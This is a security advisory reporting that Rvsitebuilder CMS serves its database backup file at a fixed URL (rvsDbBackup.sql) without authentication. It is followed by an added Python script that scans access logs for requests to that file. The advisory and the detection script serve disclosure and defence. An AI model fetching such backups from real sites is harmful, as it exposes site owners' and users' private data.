Vendor: Rvsitebuilder CMS
By: Hesam Bazvand
CVSS: 7.5 (HIGH)
Database Backup Download
CWE: N/A
Product Name: Rvsitebuilder CMS
Affected Version From: All Versions
Affected Version To: All Versions
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 / Kali Linux
2020
Rvsitebuilder CMS Database Backup Download
Rvsitebuilder CMS allows an attacker to download the database backup file without authentication. The file is served in response to a request to the URL http://Target/rvsDbBackup.sql, with no authentication check in front of it.
Mitigation:
The vendor should ensure that the database backup file is not accessible without authentication.
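
A defensive check for the exposure described above, as an added example that is not part of the original advisory: it scans web server access logs for requests to the rvsDbBackup.sql file and separates requests the server answered with the file from ones it refused. The combined log format, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

BACKUP_NAME = "rvsdbbackup.sql"  # file name from the advisory, compared case-insensitively

# Apache/nginx "combined" log format (assumed; adjust the pattern to your format)
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def find_backup_requests(lines):
    """Return one record per request for the backup file, in log order."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        # Drop the query string and decode %xx so encoded variants still match
        path = unquote(urlsplit(m["target"]).path)
        if path.rsplit("/", 1)[-1].lower() != BACKUP_NAME:
            continue
        status = int(m["status"])
        hits.append({
            "ip": m["ip"],
            "time": m["ts"],
            "status": status,
            "bytes": 0 if m["size"] == "-" else int(m["size"]),
            # a non-HEAD request answered 200/206 means file content left the server
            "served": status in (200, 206) and m["method"] != "HEAD",
        })
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic
SAMPLE = [
    '192.0.2.10 - - [12/Mar/2020:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Mar/2020:10:03:44 +0000] "GET /rvsDbBackup.sql HTTP/1.1" 200 734003 "-" "curl/7.68.0"',
    '198.51.100.7 - - [12/Mar/2020:10:03:50 +0000] "GET /RVSDBBACKUP.SQL?x=1 HTTP/1.1" 404 196 "-" "curl/7.68.0"',
    '203.0.113.5 - - [12/Mar/2020:11:15:09 +0000] "HEAD /site/rvsDbBackup%2Esql HTTP/1.1" 403 - "-" "-"',
]

if __name__ == "__main__":
    for hit in find_backup_requests(SAMPLE):
        verdict = "BACKUP SERVED" if hit["served"] else "probe"
        print(f'{hit["time"]} {hit["ip"]} status={hit["status"]} bytes={hit["bytes"]} {verdict}')
```

Any record with `served` set means the database contents should be treated as disclosed; the remaining records show who is looking for the file.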